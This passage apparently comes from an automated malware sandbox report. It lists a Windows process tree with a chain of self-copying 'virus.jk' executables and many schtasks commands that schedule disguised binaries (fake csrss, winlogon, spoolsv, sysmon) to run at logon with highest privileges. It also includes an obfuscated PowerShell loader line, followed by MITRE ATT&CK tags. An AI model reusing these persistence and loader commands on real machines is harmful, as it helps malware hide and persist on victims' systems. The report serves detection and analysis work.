C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.exe"C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.exe"8⤵PID:4216
-
C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.exe"C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.exe"9⤵PID:7208
-
C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.exe"C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.exe"10⤵PID:5868
-
C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.exe"C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.exe"11⤵PID:6536
-
C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"12⤵PID:7844
-
C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"13⤵PID:4668
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "7f1630df6b57af024a3b561bdadc208f7" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\7f1630df6b57af024a3b561bdadc208f.exe'" /f1⤵PID:232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "7f1630df6b57af024a3b561bdadc208f" /sc ONLOGON /tr "'C:\Users\Default User\7f1630df6b57af024a3b561bdadc208f.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -windowstyle minimized "$Teratism249 = Get-Content 'C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168' ; $Neglefilen=$Teratism249.SubString(69482,3);.$Neglefilen($Teratism249) "1⤵
- Command and Scripting Interpreter: PowerShell
PID:3020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "7f1630df6b57af024a3b561bdadc208f7" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\7f1630df6b57af024a3b561bdadc208f.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4728
-
C:\Windows\helppane.exeC:\Windows\helppane.exe -Embedding1⤵PID:876
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=5288812⤵PID:5472
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe1b5846f8,0x7ffe1b584708,0x7ffe1b5847183⤵PID:5508
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=5288812⤵PID:6988
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe1b5846f8,0x7ffe1b584708,0x7ffe1b5847183⤵PID:7024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1448,15605772737459734341,10919214464054975571,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:23⤵PID:3460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1448,15605772737459734341,10919214464054975571,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:33⤵PID:5452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1448,15605772737459734341,10919214464054975571,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:83⤵PID:5428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,15605772737459734341,10919214464054975571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:13⤵PID:6596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,15605772737459734341,10919214464054975571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:13⤵PID:6684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1448,15605772737459734341,10919214464054975571,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2800 /prefetch:23⤵PID:7532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1448,15605772737459734341,10919214464054975571,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=5020 /prefetch:23⤵PID:7176
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\firefox.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\SearchApp.exe'" /f1⤵PID:1020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\Default User\SearchApp.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5172
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\firefox.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\firefox.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5768
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\TextInputHost.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\Default User\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:3336
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Mail\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\winlogon.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:2600
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Mail\winlogon.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:1020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\smss.exe'" /rl HIGHEST /f1⤵PID:6156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6308
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6484
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\sysmon.exe'" /f1⤵
- Process spawned unexpected child process
PID:6612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6360 -ip 63601⤵PID:6940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Office16\57ccb6f0bd910fed428761828ae93553.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "57ccb6f0bd910fed428761828ae93553" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office16\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5928
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Saved Games\firefox.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office\Office16\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Microsoft\AppV\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1388
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\AppV\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Windows\twain_32\dwm.exe'" /f1⤵
- Process spawned unexpected child process
PID:6940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\firefox.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:6168
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft\AppV\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:6752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Program Files\Crashpad\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7124
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\twain_32\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Windows\twain_32\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "a6a1abaf12a28ea8f6553356c3bdcf57a" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\a6a1abaf12a28ea8f6553356c3bdcf57.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5172
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Saved Games\firefox.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6576
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "a6a1abaf12a28ea8f6553356c3bdcf57" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\a6a1abaf12a28ea8f6553356c3bdcf57.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5104
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6308
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:6444
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "a6a1abaf12a28ea8f6553356c3bdcf57a" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\a6a1abaf12a28ea8f6553356c3bdcf57.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:7000
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\firefox.exe'" /f1⤵
- Process spawned unexpected child process
PID:6928
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "kosomkk" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\de-DE\kosomk.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7532
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:7340
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\firefox.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7892
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "kosomk" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\de-DE\kosomk.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:8064
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\SearchApp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6864
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:7488
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\firefox.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5496
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "kosomkk" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\de-DE\kosomk.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7100
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Windows\Logs\MeasuredBoot\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7192
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7308
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 14 /tr "'C:\Program Files\Java\jdk-1.8\msedge.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2652
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\Logs\MeasuredBoot\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Windows\Logs\MeasuredBoot\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5440
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7704
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:7764
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jdk-1.8\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7856
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:8000
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\firefox.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:8008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Windows\PolicyDefinitions\taskhostw.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de519071" /sc MINUTE /mo 12 /tr "'C:\Windows\Microsoft.NET\authman\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7176
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\firefox.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\firefox.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4484
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\appcompat\encapsulation\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Windows\appcompat\encapsulation\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de519071" /sc MINUTE /mo 6 /tr "'C:\Windows\Microsoft.NET\authman\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:7564
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:8128
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b653" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Multimedia Platform\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6412
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7212
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:4652
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:7352
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Scripting
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
